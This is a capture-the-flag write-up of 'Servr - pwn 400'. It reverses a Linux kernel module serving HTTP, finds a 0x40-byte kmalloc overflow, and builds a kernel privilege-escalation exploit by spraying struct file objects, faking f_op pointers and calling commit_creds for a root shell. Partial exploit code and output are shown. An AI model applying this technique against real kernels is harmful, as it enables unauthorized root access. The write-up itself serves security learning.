Servr - pwn 400

<< Pork - pwn 250

When someone told me to go check this "web" chall out, I was rather surprised, but I gave it a shot. The challenge was presented with this archive containing a qemu-ready Linux system. The system boots perfectly fine and we get what looks like an LKM, servr.ko, in /home/servr. At this point I extract the content of the root fs:

$ tar -jxvf servr.tar.bz2
$ mkdir rootfs && cd rootfs
$ gzip -dcS .img ../servr/initramfs.img | cpio -id
3804 blocs
$ ls 
bin dev etc home init proc root sys tmp var
$ file home/servr/servr.ko 
home/servr/servr.ko: ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), [...], not stripped

So we do indeed have an x64 LKM to reverse. I guess I should take a look at web challenges more often :)

As the module is not stripped, it is not nearly as painful as it could be. servr_init contains a kernel server socket initialization:

void servr_init() {
	workqueue = __alloc_workqueue_key("servr", 1, 0, 0);
	free_workqueue = __alloc_workqueue_key("servr_free", 1, 0, 0);

	memset(&var_20, 0, 0x10);
	&var_20 = 2;
	&var_1E = 0x5000;
	kernel_bind(server_sock, &var_20, 0x10);
	kernel_listen(server_sock, 10);

	server_sock->sk_data_ready = server_sock_data_ready;

	printk("Module loaded\n");

The main information we get here is that the socket is TCP (IP + SOCK_STREAM), on port 80 (0x5000 in little-endian) and that its processing callback is server_sock_data_ready. On to this next function, we see that it does not much except waking up the servr workqueue for the accept_connection job, handled by accept_connection_cb. This callback performs kernel_accepts, and sets some callbacks for the new accepted client sockets. Those new functions are similar: from client_sock_data_ready to client_work_cb().

This function is much longer so I won't detail it. What it basically does is:

  • 1. get data from the socket into a kmalloced/krealloced buffer 0x100 bytes by 0x100 bytes
  • 2. when finished, checks that it contains a "\r\n\r\n" token
  • 3. some strsep() to check the method and HTTP version from the first line
  • 4. f ok, parses the headers to find the "Content-Length" header
  • 5. calls finish_handle_request() if no error occured

The body of the request (after "\r\n\r\n") is at *(r15 + 0x68) = *(rbx + 0x60). The content-length header, if any, sets up r15 + 0x70 = rbx + 0x68 = *rbp + var_B0:

	mov [r11+10h], r14
	mov [r11+18h], r13
	mov rdi, offset aContentLength
	mov rsi, r14
	mov ecx, 0Fh
	repe cmpsb
	jz loc_B20

	mov rdx, [rbp+var_B0]
	mov esi, 0Ah
	mov rdi, r13
	mov [rbp+var_B8], r11
	call kstrtoll
	test eax, eax
	mov r11, [rbp+var_B8]
	jz loc_A5B
	mov qword ptr [r15+70h], 0
	jmp loc_A5B
	mov rax, [rbx+68h]
	cmp rax, 1000h
	ja short send_error

And this field cannot be above 0x1000. On to the finish_handle_request, having r15 as its only arg:

	mov rdi, [rdi+70h]
	test rdi, rdi
	jz loc_660 // clength == 0

	mov [rbx+80h], rdi
	mov esi, 80D0h
	call __kmalloc // kmalloc(clength)
	test rax, rax
	mov [rbx+78h], rax
	jz loc_660

	mov r8, 0D4B4F2030303220h // HTTP response headers
	mov r9, 3A7265767265530Ah
	mov r10, 312F727672657320h
	mov r11, 746E6F430A0D302Eh
	mov rcx, 702F74786574203Ah
	mov rdi, 312E312F50545448h
	mov rdx, 657079742D746E65h
	mov rsi, 0A0D0A0D6E69616Ch
	mov byte ptr [rbx+90h], 1
	mov [rax+8], r8
	mov [rax+10h], r9
	mov [rax+18h], r10
	mov [rax+20h], r11
	mov [rax+30h], rcx
	mov [rax], rdi
	mov [rax+28h], rdx
	mov [rax+38h], rsi
	mov byte ptr [rax+40h], 0
	mov rdi, [rbx+78h]
	mov rsi, [rbx+68h] ; src
	mov rdx, [rbx+70h] ; n
	add rdi, 40h ; dest
	call memcpy

There is a kmalloc with the size of the body, then 0x40 bytes are copied at the beginning - the HTTP response headers -, to which the original request body is concatenated by this last memcpy. So we have a buffer total length of 0x40 + our content length header, whereas the kmalloc was only the size of the content length. This is a classical kmalloc() overflow, as the hints suggested.

To optimize allocations, the kernel pre-allocates pages (or slabs), containing several chunks of the same memory size, for well-known kernel objects such as inodes or task_struct, or for general-purpose allocation (kmalloc-32, kmalloc-96, kmalloc-1024, ...). To get more details on Linux kernel allocators, check out this article. What is nice in this case is that we can choose in which slab kmalloc will allocate its object, as we control the length. What isn't is that the overflow is only 0x40 bytes, which isn't a whole lot.

The goal in kmalloc overflows is to force a well-known kernel object to be allocated just after the overflowed one. We spray the slab of a particular kernel object by asking lots of allocations from userspace. We delete one of them through a kfree(). We allocate a chunk of the same size, which should be placed at the place of our kfreed object, just before one of ther other sprayed objects. If this object contains a function pointer or a pointer dereferenced to write data in a kernel path we can trigger from userspace, we can execute code in ring0.

A nice struct to overwrite is the struct file, as it contains a pointer to a function pointers struct, f_op. So the idea is to create a lot of files, discover in which slqb the structs are created, and perform an overflow in this one: exactly what I didn't do during the actual CTF, as I was sure that struct file ought to be in kmalloc-128 - gg no re. We can change the init file to set uid=0 and be able to check the /proc/slabinfo file (repack the initramfs with find . | cpio --create --format='newc' > /tmp/initramfs.img at the root and gunzip it).

int main() {
	int i;
	int * files;
	char tmpfile[100];

	files = malloc(sizeof(int));

	/* Spray slab with file structs */
	for (i=0;;i++) {
		sprintf(tmpfile, "/tmp/tmpfile%d", i);
		files = realloc(files, (i+1)*sizeof(int));
		if ((files[i] = open(tmpfile, O_RDWR|O_CREAT|O_SYNC)) < 0)


	return 0;

We close one file descriptor or else we cannot open /proc/slabinfo. We can see several differences between the two slab checks:

# /home/servr/test
# name <active_objs> [...]
inode_cache 3276
dentry 3276
kmalloc-256 448 
kmalloc-16 2560 
[+] Created 1021 files
# name <active_objs> [...]
inode_cache 4298
dentry 4305
kmalloc-256 1456
kmalloc-16 3584
/ #

As expected, we see the number of inodes, dentries, etc.. go up, as well as two object-specific slabs. 16 cannot be the one we are searching for, so it has to be 256. Knowing this, we try to allocate a large number of files, delete one of them, trigger the overflow, and do an arbitrary write operation on every file. If one of their descriptor has been overwritten, the system should crash. Actually, trying that, nothing happens. This may be because other objects are allocated in this slab before the targetted kmalloc happens, so we need to delete more files. Nothing for 2 files either, let's try 3:

/ $ /home/servr/test 3
[+] Created 1021 files
[+] Payload sent (296 bytes)
[ 10.025136] general protection fault: 0000 [#1] SMP 
[ 10.025136] Modules linked in: servr(O)
[ 10.025136] CPU 0 
[ 10.025136] Pid: 840, comm: test Tainted: G O 3.8.7 #35 Bochs Bochs
[ 10.025136] RIP: 0010:[<ffffffff8112dd12>] [<ffffffff8112dd12>] vfs_write+0x32/0x180
[ 10.025136] RSP: 0018:ffff880002faff08 EFLAGS: 00000206
[ 10.025136] RAX: 4141414141414141 RBX: ffff880002832900 RCX: ffff880002faff50
[ 10.025136] [<ffffffff8112e0bd>] sys_write+0x4d/0x90
[ 10.025136] [<ffffffff8178c052>] system_call_fastpath+0x16/0x1b

Which works. Now we just have to craft our struct file data a bit, so that it passes the different checks in vfs_write and some of its subcalls such as rw_verify_area. Thoses functions are not very long, so we can do this pretty easily:

void setup_file(char * file) {
	*(char **)(file + 0x18) = dentry_addr;
	*(char **)(dentry_addr + 0x30) = inode_addr;
	*(char **)(inode_addr + 0x38) = i_security_addr;
	*(char **)(inode_addr + 0x138) = 0; //inode->flock

	*(char **)(file + 0x20) = f_op_addr;
	*(char **)(f_op_addr + 0x18) = write_addr;
	*(char **)(f_op_addr + 0x28) = aio_write_addr;

	*(file + 0x3c) = 2; // FMODE_WRITE
	*(file + 0x3f) = 1; // FMODE_NOTIFY
	*(char **)(file + 0x40) = 0;	// pos

All those addresses are arbitrary addresses that have to be valid. Because we are directly switching from userland to kernel space with a write syscall, our process' address space is still valid during kernel code execution. The pointer to be executed is f_op->write, so we have write_addr pointing to a basic kernel exploit code:

int __attribute__((regparm(3))) leetbbq() {
	return 0; // avoid fsnotify
The full exploit code is available here:
/ $ /home/servr/sploit 3
[+] Looking up kernel symbols...
[+] Resolved symbol commit_creds to 0xffffffff81063250
[+] Resolved symbol prepare_kernel_cred to 0xffffffff81063510
[+] Created 1021 files
[+] Payload sent (296 bytes)
[+] Launching root shell!
/ # id
uid=0(root) gid=0(root)
/ # 

A shame that I was blindly overflowing into kmalloc-128 the whole sunday for some reason... Great CTF challenge, PPP delivers yet again.

<< Pork - pwn 250


  1. FrizN 05/04/13 13:39

    You can etiher echo -en the hex version of your executable, or base64 encode it for instance. I'll update the article with that next week.

  2. Anonyme 05/04/13 13:15

    Excellent post. Could you please give the steps to compile/port the code to qemu image?


  3. Anon 04/26/13 00:40

    Excellent article !